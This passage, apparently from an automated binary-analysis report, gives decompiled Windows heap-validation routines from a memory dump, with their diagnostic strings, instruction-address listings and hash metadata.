					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Parameter3: %p\n",  *0x14a58ac);
				}
				_t119 =  *0x14a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x14a58b4);
					E013BB150("Last known valid blocks: before - %p, after - %p\n",  *0x14a58b0);
				} else {
					_t120 =  *0x14a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E013BB150();
				} else {
					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E013BB150("Stack trace available at %p\n", 0x14a58c0);
			}











                                                0x01471c10
                                                0x01471c16
                                                0x01471c1e
                                                0x01471c3d
                                                0x01471c3e
                                                0x01471c20
                                                0x01471c35
                                                0x01471c3a
                                                0x01471c44
                                                0x01471c55
                                                0x01471c5a
                                                0x01471c65
                                                0x01471c67
                                                0x00000000
                                                0x01471c6e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01471c67
                                                0x01471cdc
                                                0x01471ce5
                                                0x01471d04
                                                0x01471d05
                                                0x01471ce7
                                                0x01471cfc
                                                0x01471d01
                                                0x01471d0b
                                                0x01471d17
                                                0x01471d1f
                                                0x01471d25
                                                0x01471d30
                                                0x01471d4f
                                                0x01471d50
                                                0x01471d32
                                                0x01471d47
                                                0x01471d4c
                                                0x01471d61
                                                0x01471d67
                                                0x01471d68
                                                0x01471d6e
                                                0x01471d79
                                                0x01471d98
                                                0x01471d99
                                                0x01471d7b
                                                0x01471d90
                                                0x01471d95
                                                0x01471daa
                                                0x01471db0
                                                0x01471db1
                                                0x01471db7
                                                0x01471dc2
                                                0x01471de1
                                                0x01471de2
                                                0x01471dc4
                                                0x01471dd9
                                                0x01471dde
                                                0x01471df3
                                                0x01471df9
                                                0x01471dfa
                                                0x01471e00
                                                0x01471e0a
                                                0x01471e13
                                                0x01471e32
                                                0x01471e33
                                                0x01471e15
                                                0x01471e2a
                                                0x01471e2f
                                                0x01471e39
                                                0x01471e4a
                                                0x01471e02
                                                0x01471e02
                                                0x01471e08
                                                0x00000000
                                                0x00000000
                                                0x01471e08
                                                0x01471e5b
                                                0x01471e7a
                                                0x01471e7b
                                                0x01471e5d
                                                0x01471e72
                                                0x01471e77
                                                0x01471e95

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                • API String ID: 0-2897834094
                                                • Opcode ID: 681bb61d6b7c58dc3daa83db7287e0053bb517e33225d291cf5aef6e66638921
                                                • Instruction ID: 115735cd9e3399b976099142915e3366c97ceea4115c7f4b89c762c7099e362c
                                                • Opcode Fuzzy Hash: 681bb61d6b7c58dc3daa83db7287e0053bb517e33225d291cf5aef6e66638921
                                                • Instruction Fuzzy Hash: 82610636521141DFD711AB89D4C5DB5B7A8EB04D38B8A803FF6096F731EA349C428F4A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01474AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 59%
                                                			E01474AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E013BB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0146FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E013BB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E013BB150();
									} else {
										E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E013BB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0146FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E013BB150();
										} else {
											E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0140D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0147A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E013DE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0147A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E013DE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E013DA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E013DA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E013DBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E014623E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E013B1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                0x01474af7
                                                0x01474afb
                                                0x01474afd
                                                0x01474b01
                                                0x01474b03
                                                0x01474b08
                                                0x01474b0a
                                                0x01474b0f
                                                0x01474eb5
                                                0x01474eb5
                                                0x01474ebb
                                                0x014750d5
                                                0x014750d8
                                                0x01474ff6
                                                0x00000000
                                                0x01474ff6
                                                0x014750de
                                                0x014750e4
                                                0x014750e8
                                                0x01475107
                                                0x0147510c
                                                0x014750ea
                                                0x014750ff
                                                0x01475104
                                                0x01475112
                                                0x01475115
                                                0x01475118
                                                0x01475119
                                                0x014750cb
                                                0x014750cb
                                                0x014750af
                                                0x00000000
                                                0x014750af
                                                0x01474ecb
                                                0x014750b6
                                                0x014750bb
                                                0x01474ed1
                                                0x01474ee6
                                                0x01474eeb
                                                0x014750c1
                                                0x014750c2
                                                0x014750c5
                                                0x014750c6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01474b15
                                                0x01474b15
                                                0x01474b1c
                                                0x01474b1e
                                                0x01474b23
                                                0x01474b27
                                                0x01474b33
                                                0x01474b38
                                                0x01474b3a
                                                0x01474b3c
                                                0x01474b41
                                                0x01474b41
                                                0x01474b3a
                                                0x01474b52
                                                0x01475045
                                                0x0147504b
                                                0x0147504f
                                                0x0147506e
                                                0x01475073
                                                0x01475051
                                                0x01475066
                                                0x0147506b
                                                0x01475083
                                                0x01475088
                                                0x01475088
                                                0x0147508a
                                                0x01475091
                                                0x01475099
                                                0x01475099
                                                0x0147509d
                                                0x014750a7
                                                0x014750ad
                                                0x014750ad
                                                0x014750ad
                                                0x00000000
                                                0x0147509d
                                                0x01474b58
                                                0x01474b5b
                                                0x01474b5e
                                                0x01474b63
                                                0x01474b66
                                                0x01474b69
                                                0x01474b6f
                                                0x01474be4
                                                0x01474bf0
                                                0x01474bf2
                                                0x01474bf5
                                                0x01474dc3
                                                0x01474dc6
                                                0x01474dc9
                                                0x01474dce
                                                0x01474dce
                                                0x01474dd0
                                                0x01474dd0
                                                0x01474dd5
                                                0x01474def
                                                0x01474dd7
                                                0x01474de7
                                                0x01474de7
                                                0x01474df3
                                                0x01475001
                                                0x01475007
                                                0x0147500b
                                                0x0147502a
                                                0x0147502f
                                                0x0147500d
                                                0x01475022
                                                0x01475027
                                                0x01475039
                                                0x0147503a
                                                0x0147503b
                                                0x00000000
                                                0x01474df9
                                                0x01474dfd
                                                0x01474e90
                                                0x01474e94
                                                0x01474e9e
                                                0x01474ea4
                                                0x01474ea4
                                                0x01474ea4
                                                0x01474ea6
                                                0x01474ea6
                                                0x00000000
                                                0x01474ea6
                                                0x01474e03
                                                0x01474e08
                                                0x01474f88
                                                0x01474f92
                                                0x01474f99
                                                0x01474f9c
                                                0x01474fe0
                                                0x01474fe4
                                                0x01474fee
                                                0x01474ff4
                                                0x01474ff4
                                                0x01474ff4
                                                0x00000000
                                                0x01474fe4
                                                0x01474f9e
                                                0x01474fa4
                                                0x01474fa8
                                                0x01474fc7
                                                0x01474fcc
                                                0x01474faa
                                                0x01474fbf
                                                0x01474fc4
                                                0x01474fd2
                                                0x01474fd5
                                                0x01474fd6
                                                0x01474f34
                                                0x01474f34
                                                0x00000000
                                                0x01474f39
                                                0x01474e0e
                                                0x01474e14
                                                0x01474e1b
                                                0x01474e25
                                                0x01474e2b
                                                0x01474e2b
                                                0x01474e33
                                                0x01474e38
                                                0x01474e8a
                                                0x01474e8a
                                                0x00000000
                                                0x01474e3a
                                                0x01474e3e
                                                0x01474e43
                                                0x01474e47
                                                0x01474e53
                                                0x01474e58
                                                0x01474e5a
                                                0x01474e5c
                                                0x01474e61
                                                0x01474e61
                                                0x01474e5a
                                                0x01474e6e
                                                0x01474f41
                                                0x01474f47
                                                0x01474f4b
                                                0x01474f6a
                                                0x01474f6f
                                                0x01474f4d
                                                0x01474f62
                                                0x01474f67
                                                0x01474f7f
                                                0x01474f80
                                                0x01474f81
                                                0x00000000
                                                0x01474e74
                                                0x01474e78
                                                0x01474e82
                                                0x01474e88
                                                0x01474e88
                                                0x00000000
                                                0x01474e78
                                                0x01474e6e
                                                0x01474e38
                                                0x01474df3
                                                0x01474bfe
                                                0x01474c01
                                                0x01474c04
                                                0x01474c07
                                                0x01474c09
                                                0x01474c0c
                                                0x01474c0e
                                                0x01474c0e
                                                0x01474c11
                                                0x01474c11
                                                0x01474c0c
                                                0x01474c14
                                                0x01474c17
                                                0x01474dae
                                                0x01474db2
                                                0x01474db7
                                                0x01474dba
                                                0x01474dbd
                                                0x01474ef1
                                                0x01474ef7
                                                0x01474efb
                                                0x01474f1a
                                                0x01474f1f
                                                0x01474efd
                                                0x01474f12
                                                0x01474f17
                                                0x01474f2b
                                                0x01474f2b
                                                0x01474f2d
                                                0x01474f2e
                                                0x01474f2f
                                                0x00000000
                                                0x01474f2f
                                                0x00000000
                                                0x01474c1d
                                                0x01474c1d
                                                0x01474c20
                                                0x01474c23
                                                0x01474c26
                                                0x01474c29
                                                0x01474c2c
                                                0x01474c2e
                                                0x01474d91
                                                0x01474d91
                                                0x01474d92
                                                0x01474d97
                                                0x01474d9e
                                                0x00000000
                                                0x01474d9e
                                                0x01474c34
                                                0x01474c37
                                                0x01474c39
                                                0x01474c3c
                                                0x00000000
                                                0x00000000
                                                0x01474c45
                                                0x01474c48
                                                0x01474c4e
                                                0x01474c50
                                                0x01474c78
                                                0x01474c78
                                                0x01474c7b
                                                0x01474c7d
                                                0x01474c80
                                                0x01474c84
                                                0x01474cad
                                                0x01474cad
                                                0x01474cb0
                                                0x01474cb8
                                                0x01474cbb
                                                0x01474cbe
                                                0x01474cc1
                                                0x01474cc7
                                                0x01474cdc
                                                0x01474cc9
                                                0x01474cd2
                                                0x01474cd4
                                                0x01474cd4
                                                0x01474cde
                                                0x01474ce0
                                                0x01474d13
                                                0x01474d13
                                                0x01474d16
                                                0x01474d18
                                                0x01474d29
                                                0x01474d2a
                                                0x01474d2c
                                                0x01474d34
                                                0x01474d1a
                                                0x01474d1a
                                                0x01474d1a
                                                0x01474d1d
                                                0x01474d1f
                                                0x01474d22
                                                0x01474d24
                                                0x01474d24
                                                0x01474d3c
                                                0x01474d3f
                                                0x01474d45
                                                0x01474d47
                                                0x01474d6c
                                                0x01474d6c
                                                0x01474d70
                                                0x01474d7e
                                                0x01474d84
                                                0x01474d84
                                                0x00000000
                                                0x01474d49
                                                0x01474d49
                                                0x01474d56
                                                0x01474d56
                                                0x01474d59
                                                0x00000000
                                                0x00000000
                                                0x01474d4e
                                                0x01474d50
                                                0x01474d52
                                                0x01474d8e
                                                0x01474d5d
                                                0x01474d5f
                                                0x01474d67
                                                0x00000000
                                                0x01474d67
                                                0x01474d54
                                                0x01474d54
                                                0x01474d5b
                                                0x00000000
                                                0x01474d5b
                                                0x01474ce2
                                                0x01474ce2
                                                0x01474ce5
                                                0x01474ce5
                                                0x01474ce7
                                                0x01474cfb
                                                0x01474ce9
                                                0x01474ce9
                                                0x01474cec
                                                0x01474cef
                                                0x01474cf1
                                                0x01474cf3
                                                0x01474cf3
                                                0x01474cf3
                                                0x01474cf6
                                                0x01474cf6
                                                0x01474d02
                                                0x01474d05
                                                0x00000000
                                                0x00000000
                                                0x01474d07
                                                0x01474d0f
                                                0x01474d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01474d11
                                                0x00000000
                                                0x01474ce5
                                                0x01474ce0
                                                0x01474c8a
                                                0x01474c8f
                                                0x01474c91
                                                0x00000000
                                                0x00000000
                                                0x01474c9d
                                                0x00000000
                                                0x01474c9d
                                                0x01474c52
                                                0x01474c5f
                                                0x01474c5f
                                                0x01474c62
                                                0x00000000
                                                0x00000000
                                                0x01474c57
                                                0x01474c59
                                                0x01474c5b
                                                0x01474caa
                                                0x01474c66
                                                0x01474c68
                                                0x01474c70
                                                0x01474c75
                                                0x00000000
                                                0x01474c75
                                                0x01474c5d
                                                0x01474c5d
                                                0x01474c64
                                                0x00000000
                                                0x01474c64
                                                0x01474c17
                                                0x01474b75
                                                0x01474bc4
                                                0x01474bc8
                                                0x00000000
                                                0x00000000
                                                0x01474bd9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01474b77
                                                0x01474b7a
                                                0x01474b8c
                                                0x01474b7c
                                                0x01474b7e
                                                0x01474b83
                                                0x01474b86
                                                0x01474b86
                                                0x01474b90
                                                0x01474b93
                                                0x00000000
                                                0x00000000
                                                0x01474b95
                                                0x01474bab
                                                0x01474bb0
                                                0x00000000
                                                0x00000000
                                                0x01474bb2
                                                0x01474bb9
                                                0x00000000
                                                0x00000000
                                                0x01474bbb
                                                0x01474bbe
                                                0x01474bc1
                                                0x01474bc1
                                                0x00000000
                                                0x01474bc1
                                                0x01474b97
                                                0x01474ba4
                                                0x00000000
                                                0x00000000
                                                0x01474ba6
                                                0x00000000
                                                0x01474ba6
                                                0x01474ea9
                                                0x01474ea9
                                                0x01474eb2
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
